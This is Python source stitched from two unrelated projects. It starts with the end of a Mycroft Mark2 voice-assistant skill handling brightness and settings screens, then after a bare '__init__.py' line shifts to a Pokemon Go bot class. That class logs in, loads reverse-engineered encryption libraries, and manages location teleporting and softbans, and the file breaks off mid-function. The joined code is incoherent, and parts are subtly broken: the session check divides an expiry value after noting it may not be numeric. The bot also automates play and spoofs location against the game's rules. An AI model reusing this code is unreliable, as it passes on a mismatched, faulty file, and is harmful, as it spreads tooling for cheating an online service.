# Restore the page overriding idle instead of the normal idle
self.bus.emit(self.override_idle[0])
elif len(self.idle_screens) > 0 and 'selected' in self.gui:
# TODO remove hard coded value
self.log.debug('Showing Idle screen for '
'{}'.format(self.gui['selected']))
screen = self.idle_screens.get(self.gui['selected'])
if screen:
self.bus.emit(Message('{}.idle'.format(screen)))
def handle_listener_started(self, message):
""" Shows listener page after wakeword is triggered.
Starts countdown to show the idle page.
"""
# Start idle timer
self.cancel_idle_event()
self.start_idle_event(weak=True)
# Lower the max by half at the start of listener to make sure
# loud noises don't make the level stick too much
if self.max_amplitude > 0.001:
self.max_amplitude /= 2
self.start_listening_thread()
# Show listening page
self.gui['state'] = 'listening'
self.gui.show_page('all.qml')
def handle_listener_ended(self, message):
""" When listening has ended show the thinking animation. """
self.has_show_page = False
self.gui['state'] = 'thinking'
self.gui.show_page('all.qml')
self.stop_listening_thread()
def handle_failed_stt(self, message):
""" No discernable words were transcribed. Show idle screen again. """
self.show_idle_screen()
#####################################################################
# Manage network connection feedback
def handle_internet_connected(self, message):
""" System came online later after booting. """
self.enclosure.mouth_reset()
#####################################################################
# Web settings
def on_websettings_changed(self):
""" Update use of wake-up beep. """
self._sync_wake_beep_setting()
def _sync_wake_beep_setting(self):
""" Update "use beep" global config from skill settings. """
from mycroft.configuration.config import (
LocalConf, USER_CONFIG, Configuration
)
config = Configuration.get()
use_beep = self.settings.get('use_listening_beep') is True
if not config['confirm_listening'] == use_beep:
# Update local (user) configuration setting
new_config = {
'confirm_listening': use_beep
}
user_config = LocalConf(USER_CONFIG)
user_config.merge(new_config)
user_config.store()
self.bus.emit(Message('configuration.updated'))
#####################################################################
# Brightness intent interaction
def percent_to_level(self, percent):
""" Converts the brigtness value from percentage to a
value the Arduino can read
Arguments:
percent (int): interger value from 0 to 100
return:
(int): value form 0 to 30
"""
return int(float(percent) / float(100) * 30)
def parse_brightness(self, brightness):
""" Parse text for brightness percentage.
Arguments:
brightness (str): string containing brightness level
Returns:
(int): brightness as percentage (0-100)
"""
try:
# Handle "full", etc.
name = normalize(brightness)
if name in self.brightness_dict:
return self.brightness_dict[name]
if '%' in brightness:
brightness = brightness.replace("%", "").strip()
return int(brightness)
if 'percent' in brightness:
brightness = brightness.replace("percent", "").strip()
return int(brightness)
i = int(brightness)
if i < 0 or i > 100:
return None
if i < 30:
# Assume plain 0-30 is "level"
return int((i * 100.0) / 30.0)
# Assume plain 31-100 is "percentage"
return i
except Exception:
return None # failed in an int() conversion
def set_screen_brightness(self, level, speak=True):
""" Actually change screen brightness.
Arguments:
level (int): 0-30, brightness level
speak (bool): when True, speak a confirmation
"""
# TODO CHANGE THE BRIGHTNESS
if speak is True:
percent = int(float(level) * float(100) / float(30))
self.speak_dialog(
'brightness.set', data={'val': str(percent) + '%'})
def _set_brightness(self, brightness):
# brightness can be a number or word like "full", "half"
percent = self.parse_brightness(brightness)
if percent is None:
self.speak_dialog('brightness.not.found.final')
elif int(percent) == -1:
self.handle_auto_brightness(None)
else:
self.auto_brightness = False
self.set_screen_brightness(self.percent_to_level(percent))
@intent_file_handler('brightness.intent')
def handle_brightness(self, message):
""" Intent handler to set custom screen brightness.
Arguments:
message (dict): messagebus message from intent parser
"""
brightness = (message.data.get('brightness', None) or
self.get_response('brightness.not.found'))
if brightness:
self._set_brightness(brightness)
def _get_auto_time(self):
""" Get dawn, sunrise, noon, sunset, and dusk time.
Returns:
times (dict): dict with associated (datetime, level)
"""
tz = self.location['timezone']['code']
lat = self.location['coordinate']['latitude']
lon = self.location['coordinate']['longitude']
ast_loc = astral.Location()
ast_loc.timezone = tz
ast_loc.latitude = lat
ast_loc.longitude = lon
user_set_tz = \
timezone(tz).localize(datetime.now()).strftime('%Z')
device_tz = time.tzname
if user_set_tz in device_tz:
sunrise = ast_loc.sun()['sunrise']
noon = ast_loc.sun()['noon']
sunset = ast_loc.sun()['sunset']
else:
secs = int(self.location['timezone']['offset']) / -1000
sunrise = arrow.get(
ast_loc.sun()['sunrise']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
noon = arrow.get(
ast_loc.sun()['noon']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
sunset = arrow.get(
ast_loc.sun()['sunset']).shift(
seconds=secs).replace(tzinfo='UTC').datetime
return {
'Sunrise': (sunrise, 20), # high
'Noon': (noon, 30), # full
'Sunset': (sunset, 5) # dim
}
def schedule_brightness(self, time_of_day, pair):
""" Schedule auto brightness with the event scheduler.
Arguments:
time_of_day (str): Sunrise, Noon, Sunset
pair (tuple): (datetime, brightness)
"""
d_time = pair[0]
brightness = pair[1]
now = arrow.now()
arw_d_time = arrow.get(d_time)
data = (time_of_day, brightness)
if now.timestamp > arw_d_time.timestamp:
d_time = arrow.get(d_time).shift(hours=+24)
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
else:
self.schedule_event(self._handle_screen_brightness_event, d_time,
data=data, name=time_of_day)
@intent_file_handler('brightness.auto.intent')
def handle_auto_brightness(self, message):
""" brightness varies depending on time of day
Arguments:
message (Message): messagebus message from intent parser
"""
self.auto_brightness = True
auto_time = self._get_auto_time()
nearest_time_to_now = (float('inf'), None, None)
for time_of_day, pair in auto_time.items():
self.schedule_brightness(time_of_day, pair)
now = arrow.now().timestamp
t = arrow.get(pair[0]).timestamp
if abs(now - t) < nearest_time_to_now[0]:
nearest_time_to_now = (abs(now - t), pair[1], time_of_day)
self.set_screen_brightness(nearest_time_to_now[1], speak=False)
def _handle_screen_brightness_event(self, message):
""" Wrapper for setting screen brightness from eventscheduler
Arguments:
message (Message): messagebus message
"""
if self.auto_brightness is True:
time_of_day = message.data[0]
level = message.data[1]
self.cancel_scheduled_event(time_of_day)
self.set_screen_brightness(level, speak=False)
pair = self._get_auto_time()[time_of_day]
self.schedule_brightness(time_of_day, pair)
#####################################################################
# Device Settings
@intent_file_handler('device.settings.intent')
def handle_device_settings(self, message):
""" Display device settings page. """
self.gui['state'] = 'settings/settingspage'
self.gui.show_page('all.qml')
@intent_file_handler('device.wifi.settings.intent')
def handle_show_wifi_screen_intent(self, message):
""" display network selection page. """
self.gui.clear()
self.gui['state'] = 'settings/networking/SelectNetwork'
self.gui.show_page('all.qml')
@intent_file_handler('device.homescreen.settings.intent')
def handle_device_homescreen_settings(self, message):
"""
display homescreen settings page
"""
screens = [{'screenName': s, 'screenID': self.idle_screens[s]}
for s in self.idle_screens]
self.gui['idleScreenList'] = {'screenBlob': screens}
self.gui['selectedScreen'] = self.gui['selected']
self.gui['state'] = 'settings/homescreen_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.ssh.settings.intent')
def handle_device_ssh_settings(self, message):
""" Display ssh settings page. """
self.gui['state'] = 'settings/ssh_settings'
self.gui.show_page('all.qml')
@intent_file_handler('device.reset.settings.intent')
def handle_device_factory_reset_settings(self, message):
""" Display device factory reset settings page. """
self.gui['state'] = 'settings/factoryreset_settings'
self.gui.show_page('all.qml')
def set_idle_screen(self, message):
""" Set selected idle screen from message. """
self.gui['selected'] = message.data['selected']
self.save_resting_screen()
def handle_device_update_settings(self, message):
""" Display device update settings page. """
self.gui['state'] = 'settings/updatedevice_settings'
self.gui.show_page('all.qml')
def handle_device_restart_action(self, message):
""" Device restart action. """
self.log.info('PlaceholderRestartAction')
def handle_device_poweroff_action(self, message):
""" Device poweroff action. """
self.log.info('PlaceholderShutdownAction')
def create_skill():
return Mark2()
__init__.py
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
import shelve
import uuid
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
from s2sphere import Cell, CellId, LatLng
from . import cell_workers
from .base_task import BaseTask
from .plugin_loader import PluginLoader
from .api_wrapper import ApiWrapper
from .cell_workers.utils import distance
from .event_manager import EventManager
from .human_behaviour import sleep
from .item_list import Item
from .metrics import Metrics
from .sleep_schedule import SleepSchedule
from pokemongo_bot.event_handlers import SocketIoHandler, LoggingHandler, SocialHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from .worker_result import WorkerResult
from .tree_config_builder import ConfigException
from .tree_config_builder import MismatchTaskApiVersion
from .tree_config_builder import TreeConfigBuilder
from .inventory import init_inventory, player
from . import inventory  # the module itself is needed for inventory.items() / inventory.pokemons() below
from sys import platform as _platform
from pgoapi.protos.POGOProtos.Enums import BadgeType_pb2
from pgoapi.exceptions import AuthException
class FileIOException(Exception):
pass
class PokemonGoBot(object):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
@property
def stardust(self):
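# Pulls the 'STARDUST' entry out of the player's currency list; relies on Python 2
# filter() returning a list (consistent with the Queue import above).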
return filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]['amount']
@stardust.setter
def stardust(self, value):
filter(lambda y: y['name'] == 'STARDUST', self._player['currencies'])[0]['amount'] = value
def __init__(self, db, config):
self.database = db
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
# @var Metrics
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.wake_location = None
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
# Threading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
self.hb_locked = False # lock hb on snip
# Inventory refresh limiting
self.inventory_refresh_threshold = 10
self.inventory_refresh_counter = 0
self.last_inventory_refresh = time.time()
# Catch on/off
self.catch_disabled = False
self.capture_locked = False # lock catching while moving to VIP pokemon
client_id_file_path = os.path.join(_base_dir, 'data', 'mqtt_client_id')
saved_info = shelve.open(client_id_file_path)
key = 'client_id'.encode('utf-8')
if key in saved_info:
self.config.client_id = saved_info[key]
else:
self.config.client_id = str(uuid.uuid4())
saved_info[key] = self.config.client_id
saved_info.close()
def start(self):
self._setup_event_system()
self.sleep_schedule = SleepSchedule(self, self.config.sleep_schedule) if self.config.sleep_schedule else None
if self.sleep_schedule:
self.sleep_schedule.work()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self):
handlers = []
color = self.config.logging and 'color' in self.config.logging and self.config.logging['color']
debug = self.config.debug
handlers.append(LoggingHandler(color, debug))
handlers.append(SocialHandler(self))
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
# @var EventManager
self.event_manager = EventManager(self.config.walker_limit_output, *handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting event should be enough to add logging and send websocket
# message:
# self.event_manager.emit('location', level='info', data={'lat': 1, 'lng': 1})
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event('debug')
self.event_manager.register_event('refuse_to_sit')
self.event_manager.register_event('reset_destination')
self.event_manager.register_event('new_destination')
self.event_manager.register_event('moving_to_destination')
self.event_manager.register_event('arrived_at_destination')
self.event_manager.register_event('staying_at_destination')
self.event_manager.register_event('buddy_pokemon', parameters=('pokemon', 'iv', 'cp'))
self.event_manager.register_event('buddy_reward', parameters=('pokemon', 'family', 'candy_earned', 'candy'))
self.event_manager.register_event('buddy_walked', parameters=('pokemon', 'distance_walked', 'distance_needed'))
# ignore candy above threshold
self.event_manager.register_event(
'ignore_candy_above_thresold',
parameters=(
'name',
'amount',
'threshold'
)
)
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# recycle stuff
self.event_manager.register_event(
'next_force_recycle',
parameters=(
'time'
)
)
self.event_manager.register_event('force_recycle')
# random alive pause
self.event_manager.register_event(
'next_random_alive_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_alive_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms',
'pokemon_name'
)
)
self.event_manager.register_event(
'incensed_pokemon_found',
parameters=(
'pokemon_id',
'encounter_id',
'encounter_location',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event('enough_ultraballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'vanish_limit_reached',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_vip_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'stardust',
'encounter_id',
'latitude',
'longitude',
'pokemon_id',
'daily_catch_limit',
'caught_last_24_hour',
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp', 'candy', 'xp')
)
self.event_manager.register_event(
'pokemon_evolve_check',
parameters=('has', 'needs')
)
self.event_manager.register_event(
'pokemon_upgraded',
parameters=('pokemon', 'iv', 'cp', 'candy', 'stardust')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
self.event_manager.register_event('catch_limit')
self.event_manager.register_event('spin_limit')
self.event_manager.register_event('show_best_pokemon', parameters=('pokemons'))
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'name', 'cp', 'ncp', 'iv_ads', 'iv_pct', 'exp', 'stardust', 'candy'
)
)
self.event_manager.register_event('egg_hatched_fail')
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'ivcp', 'below_iv', 'below_cp', 'below_ivcp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'ivcp', 'candy', 'candy_type')
)
self.event_manager.register_event(
'pokemon_keep',
parameters=('pokemon', 'iv', 'cp', 'ivcp')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
self.event_manager.register_event(
'move_to_map_pokemon',
parameters=('message')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('vanish_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
self.event_manager.register_event('eggs_hatched_log')
self.event_manager.register_event(
'badges',
parameters=('badge', 'level')
)
self.event_manager.register_event(
'player_data',
parameters=('player_data', )
)
self.event_manager.register_event(
'forts_found',
parameters=('json')
)
# UseIncense
self.event_manager.register_event(
'use_incense',
parameters=('type', 'incense_count')
)
# BuddyPokemon
self.event_manager.register_event(
'buddy_update',
parameters=('name')
)
self.event_manager.register_event(
'buddy_update_fail',
parameters=('name', 'error')
)
self.event_manager.register_event(
'buddy_candy_earned',
parameters=('candy', 'family', 'quantity', 'candy_earned', 'candy_limit')
)
self.event_manager.register_event('buddy_candy_fail')
self.event_manager.register_event(
'buddy_next_reward',
parameters=('name', 'km_walked', 'km_total')
)
self.event_manager.register_event('buddy_keep_active')
self.event_manager.register_event(
'buddy_not_available',
parameters=('name')
)
# Sniper
self.event_manager.register_event('sniper_log', parameters=('message', 'message'))
self.event_manager.register_event('sniper_error', parameters=('message', 'message'))
self.event_manager.register_event('sniper_teleporting', parameters=('latitude', 'longitude', 'name'))
# Catch-limiter
self.event_manager.register_event('catch_limit_on')
self.event_manager.register_event('catch_limit_off')
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
if self.sleep_schedule:
self.sleep_schedule.work()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self._refresh_inventory()
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
nearby_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
if "nearby_pokemons" in cell and len(cell["nearby_pokemons"]):
latlng = LatLng.from_point(Cell(CellId(cell["s2_cell_id"])).get_center())
for p in cell["nearby_pokemons"]:
p["latitude"] = latlng.lat().degrees
p["longitude"] = latlng.lng().degrees
p["s2_cell_id"] = cell["s2_cell_id"]
nearby_pokemons += cell["nearby_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
# dont cache when teleport_to
if self.api.teleporting:
return
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def emit_forts_event(self,response_dict):
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
if map_cells and len(map_cells):
for cell in map_cells:
if "forts" in cell and len(cell["forts"]):
self.event_manager.emit(
'forts_found',
sender=self,
level='debug',
formatted='Found forts {json}',
data={'json': json.dumps(cell["forts"])}
)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent a crash if the returned expiry value is not numeric
if not str(self.api._auth_provider._ticket_expire).isdigit():
self.logger.info("Ticket expired value is not numeric", 'yellow')
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
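# _ticket_expire appears to be in milliseconds (hence the / 1000); e.g. a ticket expiring
# 45 s from now gives remaining_time ~= 45, below the 60 s threshold, triggering a re-login.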
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
self.api.set_signature_lib(self.get_encryption_lib())
self.api.set_hash_lib(self.get_hash_lib())
def login(self):
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt be kept at zero?
try:
self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password))
except AuthException as e:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted='Login process failed: {}'.format(e))
sys.exit()
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
self.heartbeat()
def get_encryption_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'src/pgoapi/pgoapi/lib/encrypt64.dll'
else:
file_name = 'src/pgoapi/pgoapi/lib/encrypt32.dll'
if _platform.lower() == "darwin":
file_name= 'src/pgoapi/pgoapi/lib/libencrypt-osx-64.so'
if _platform.lower() == "linux" or _platform.lower() == "linux2":
file_name = 'src/pgoapi/pgoapi/lib/libencrypt-linux-x86-64.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + ' could not be found! Please place it in the bot\'s root directory or set encrypt_location in config.')
self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def get_hash_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'src/pgoapi/pgoapi/lib/niantichash64.dll'
else:
file_name = 'src/pgoapi/pgoapi/lib/niantichash32.dll'
if _platform.lower() == "darwin":
file_name= 'src/pgoapi/pgoapi/lib/libniantichash-osx-64.so'
if _platform.lower() == "linux" or _platform.lower() == "linux2":
file_name = 'src/pgoapi/pgoapi/lib/libniantichash-linux-x86-64.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + ' could not be found! Please place it in the bot\'s root directory')
